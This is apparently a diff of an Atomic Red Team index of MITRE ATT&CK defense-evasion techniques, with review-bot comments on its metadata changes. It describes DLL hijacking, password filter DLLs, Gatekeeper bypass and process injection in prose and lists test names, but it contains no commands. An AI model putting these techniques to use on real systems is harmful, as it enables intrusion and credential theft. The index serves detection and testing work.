There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -6016,8 +6082,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -6031,7 +6097,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -6057,6 +6123,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -6084,7 +6154,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
@@ -6153,7 +6222,7 @@ defense-evasion:
elevation_required: true
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -6249,7 +6318,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests:
- name: Gatekeeper Bypass
@@ -6334,7 +6402,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -6399,11 +6466,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -6464,7 +6530,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests:
- name: Take ownership using takeown utility
@@ -6624,7 +6689,7 @@ defense-evasion:
elevation_required: true
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -6650,7 +6715,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -6692,7 +6757,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -6734,7 +6798,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -6757,7 +6821,6 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests:
- name: Msiexec.exe - Execute Local MSI file with embedded JScript
@@ -7162,31 +7225,7 @@ defense-evasion:
name: command_prompt
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
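Review bot: everything deleted in this hunk except `modified` (which moves forward from 2022-04-25 to 2024-08-21) is re-added in the next hunk in a different order, so this is a field reorder rather than a content change. Review the two hunks field by field rather than reading the red block as a deletion; the id, created, contributors, platforms, domains, marking and both external references all reappear below.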
@@ -7210,22 +7249,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
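Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is removed from T1556.002 with no replacement, alongside the added `revoked: false` and the reordered fields. That list was the only structured hint in the technique block that registering a password filter DLL needs administrative rights on the host or domain controller; if any index consumer relied on it, it now has to take that from the atomic test's own `elevation_required`. Everything else removed in the previous hunk is present again here, so no reference or marking was lost in the move.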
@@ -7393,7 +7454,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -7419,7 +7479,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -7442,8 +7502,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
@@ -7539,7 +7597,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
@@ -7764,60 +7821,71 @@ defense-evasion:
name: powershell
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests:
- name: Indirect Command Execution - pcalua.exe
@@ -7992,7 +8060,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests:
- name: Deobfuscate/Decode Files Or Information
@@ -8334,17 +8401,20 @@ defense-evasion:
elevation_required: false
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
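Review bot: the `description` block scalar indicator changes from `|-` to `|+` at the top of this hunk, so the T1562 description will now keep every trailing newline instead of stripping them; every other technique in this file (T1036, T1205, T1070.006, T1480.002, T1497.003, T1218.003, T1218.002, T1562.004) stays on `|-`, so the serialized string for this one entry will end in newline characters. Unless the upstream bundle really carries trailing blank lines here, the generator should emit `|-` consistently.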
@@ -8353,15 +8423,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -8399,15 +8471,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests:
- name: Windows Disable LSA Protection
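Review bot: the new "Google Cloud Mandiant UNC3886 2024" reference description is a double-quoted string that begins with a leading space (`" Punsaen Boonyakarn, ...`), which YAML preserves in the parsed value; strip it so the entry matches the other references. The removed `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines at the bottom of this hunk are not a regression, since the same keys are re-emitted higher in the object in the two previous hunks (`x_mitre_attack_spec_version: 3.2.0` after `phase_name`, `x_mitre_modified_by_ref` after `x_mitre_is_subtechnique`), so the object keeps both values; it is only a key reordering.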
@@ -8491,7 +8565,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
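Review bot: the `modified` timestamp for Thread Execution Hijacking moves backwards, from '2022-04-25T14:00:00.188Z' to '2021-10-18T12:22:50.800Z'. The same regression appears below for T1055 (2023-05-09 to 2023-03-30), T1205 (2022-11-08 to 2022-10-19), T1218.002 (2022-05-11 to 2022-03-11), Network Address Translation Traversal (2021-04-29 to 2020-10-21) and the final SIP and trust provider hunk (2022-05-24 to 2022-05-05). Several of the old values share the suffix 14:00:00.188Z, which suggests they were bulk-stamped rather than real edit times; if so, a line in the commit message saying the new values come from the upstream STIX bundle would save the next reader from wondering whether the generator picked up a stale source.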
@@ -8539,8 +8613,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests:
- name: Thread Execution Hijacking
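Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1055.003 and, unlike T1202 and T1562 above, nothing in the hunk re-adds an `x_mitre_attack_spec_version` value, so the field is gone unless it is emitted elsewhere in the object outside the shown context. The same pattern applies to T1218.002 and Network Address Translation Traversal further down. Confirm those three objects still carry an attack spec version, or that its absence is intentional for techniques not revised upstream since spec 2.1.0.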
@@ -8559,7 +8631,7 @@ defense-evasion:
name: powershell
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -8575,7 +8647,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -8600,6 +8672,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -8617,8 +8690,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -8631,7 +8704,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests:
- name: System File Copied to Unusual Location
@@ -8679,7 +8751,7 @@ defense-evasion:
name: powershell
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -8716,9 +8788,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
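Review bot: `Office 365` and `Google Workspace` are removed from `x_mitre_platforms` and replaced by the single `Office Suite` value (the same consolidation happens for T1562 and T1550 elsewhere in this patch). Any per-platform index derived from these platform lists should be regenerated in the same change so that techniques formerly indexed under the old platform names do not silently vanish or go stale.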
@@ -8756,9 +8827,8 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests:
- name: Copy and Delete Mailbox Data on Windows
@@ -8895,7 +8965,7 @@ defense-evasion:
elevation_required: true
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -8998,7 +9068,6 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests:
- name: Shellcode execution via VBA
@@ -9410,7 +9479,7 @@ defense-evasion:
elevation_required: true
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -9494,7 +9563,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -9561,7 +9629,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
